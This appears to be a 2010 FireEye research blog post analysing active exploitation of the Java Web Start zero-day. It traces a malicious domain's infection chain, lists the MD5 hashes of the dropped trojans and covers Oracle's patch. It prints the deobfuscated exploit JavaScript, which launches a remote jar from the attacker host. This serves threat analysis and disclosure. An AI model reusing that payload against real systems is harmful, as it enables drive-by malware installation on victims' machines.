Blog

Who is Exploiting the Java Zero-Day?

Update: Oracle released an emergency patch recently to fix this major flaw. See details in the bottom.

————-

The recent discovery of a 0-day design flaw in the 'Java Web Start' module has opened new avenues for malware drive by attacks.  This flaw was exposed by Tavis Ormandy a few days back and it did not take a long time for bad guys to start using the proof of concept code for real exploitation.  I have been reading about the exploit details for the last few days, but very few details were available on the active use of this exploit.  Who are the guys using this exploit and for spreading what?  This article is all about this, with emphasis on the post infection stuff.

Users who are interested in the inner workings of this 0-day flaw itself, can read the full disclosure here.

It all started like this… yesterday afternoon my colleague Stuart Staniford pointed me to a malicious domain hxxp://zikkuat.com (dead at the moment) which he believed seemed to be exploiting this 0-day flaw.  After a little analysis, I found it to be true indeed.  Here are the details of my findings after a detailed analysis.

The whois record shows that zikkuat.com was registered around April 8th, 2010 (a day before Travis's public disclosure).

The sequence of events after I opened zikkuat.com from my lab were like this:

1. hxxp://zikkuat.com  [main exploit page]

2. hxxp://zikkuat.com/50035/value3.php [sub exploit page, loaded from main page]

3. hxxp://zikkuat.com/50035/C0.php      [path to the .jar file, which further downloaded the first level malware]

4. hxxp://zikkuat.com/50035/54098876  [actual malware (Trojan.Piptea), windows PE binary]

5. Trojan.Piptea further dropped different pieces of malware onto the infected machine. I'll go into the malware details later on.

6a00d835018afd53ef0133ecb923da970b
 

The main exploit page was highly obfuscated and looked like this:

First_level

This script, after de-obfuscation, would look like this:

Deobfuscated

As we can see above, that main script further loads hxxp://zikkuat.com/50035/value3.php. After de-obfuscating the contents of value3.php, it looks like this: (Thanks to Julia Wolf for de-obfuscating it real quick)

var u = "http: -J-jar -J\\\\zikkuat.com\\50035\\C0.php
none";

if 
(window.navigator.appName == "Microsoft Internet Explorer") {

        var o =
document.createElement("OBJECT");

        o.classid = "clsid:CAFEEFAC-
DEC7-0000-0000-ABCDEFFEDCBA";

        o.launch(u); }

        else {

               var o =
document.createElement("OBJECT");

               var n =
document.createElement ("OBJECT");

               o.type =
"application/npruntime-scriptable-plugin;deploymenttoolkit"; n.type =
"application/java-deployment- toolkit"; document.body.appendChild(o);
document.body.appendChild (n);  try
{o.launch(u); } catch (e) {n.launch(u);

        }

}

As we can see, the value3.php script in plain text looks very similar to the proof of concept code written by Tavis.

Successful execution of this this script on the vulnerable system would execute "/50035/C0.php",  a jar file (java self executable) on the vulnerable system which would further open gates for all types of badness.

The jar file after de-compilation looks like this:

Decompiled

It's clearly visible from the code that this jar file downloads and executes Trojan.Piptea from URL hxxp://zikkuat.com/50035/54098876.  Trojan.Piptea is a powerful malware down-loader and part of a very big pay per install network.  In a sample run inside my virtual machine, Piptea dropped more than 6 different pieces of malware on the infected systems.  I am pretty sure the author of these 6 malware would have paid good enough money to the Piptea guys for dropping their creations across the Piptea zombies base.

The MD5s of these malware are:

0A557F250F96F31127AE3CB79B137D6E  — Trojan.Piptea

a370bfa39a4ebcef8b5e3ffb4cfcd594      –
Trojan.Horst

e578a329bb6fcbafe8ec342eba3221e0    –
Trojan.Opachki

50c16385c80b65a5f41808a1e795638b    – 
Trojan.Wimpixo

f11ad564e29714149314489baceed9da    –
Trojan.Bubnix

7cee3e1bf4e48dc0d70e93aa30f93e27     — Trojan.Fakerean

27B2A4F2D3DDF2A3187C324163EB9950  — Trojan.Piptea (Update)

d9965ca03c53e4f5de232a81e415a537    — Trojan.Ertfor

Users who want to learn more about the motives behind dropping multiple malware on the infected system may read my earlier articles about BotnetWeb written back in April 2009.

http://www.fireeye.com/research/2009/04/botnetweb.html

http://www.fireeye.com/research/2009/04/botnetweb-part-ii.html

Researchers from TrendMicro recently (this April) also came up with a similar concept named as BotnetMap

It's pretty obvious that the simplicity and reliability of this exploit will make it a lethal weapon for the bad guys in coming days.  Plus, the unavailability of any working patch is making the overall picture scarier.  I am pretty sure that in the coming days, this exploit will become part of underground exploit kits.  This means that even a kiddie with basic computer skills and bad intentions can start making money out of this. Today ESET mentioned in their blog that they have seen this flaw being used in a targeted attack as well.

Tavis' disclosure also mentions some workarounds for IE and Firefox users. I would urge users to use these workarounds until a working patch becomes available. 

————-

Professional IT users may visit the following link for technical details:
http://www.oracle.com/technology/deploy/security/alerts/alert-cve-2010-0886.html

If you are looking for an easy way to update your home computer visit the following:
http://www.java.com/ and click on 'Free Java Download'

Atif Mushtaq @ FireEye Malware Intelligence Lab

Detailed Question/Comments : research SHIFT-2 fireeye DOT COM

3 thoughts on “Who is Exploiting the Java Zero-Day?

  1. Nice work.
    The quoted script attempts to exploit Firefox and Chrome as well, this is done using the “o” and “n” objects

  2. This vulnerability have been silently fixed in the most recent java update (Yesterday)

  3. FYI. Looks like your research posts are having a positive effect!!
    >> Oracle Security Alert CVE-2010-0886
    Description
    This Security Alert addresses security issues CVE-2010-0886 and CVE-2010-0887, which are vulnerabilities in desktop Java running in web browsers … These vulnerabilities may be remotely exploitable without authentication, i.e., they may be exploited over a network without the need for a username and password. For a successful exploit, a user running an affected release in their browser will need to visit a malicious web page that exploits this vulnerability. Successful exploits can impact the availability, integrity, and confidentiality of the user’s system.
    Supported Products Affected
    Java SE
    • JDK and JRE 6 for Windows, Solaris, and Linux
    Java for Business
    • JDK and JRE 6 for Windows, Solaris and Linux
    Patch Availability
    Customers who use default Java installation settings that include the automatic update of Java for security and other issues will have these fixes automatically applied over the next 30 days. Customers who do not have automatic update enabled or who want to immediately apply these important fixes, as is recommended by Oracle… (SEE URL FOR FULL DETAILS)
    http://www.oracle.com/technology/deploy/security/alerts/alert-cve-2010-0886.html

Comments are closed.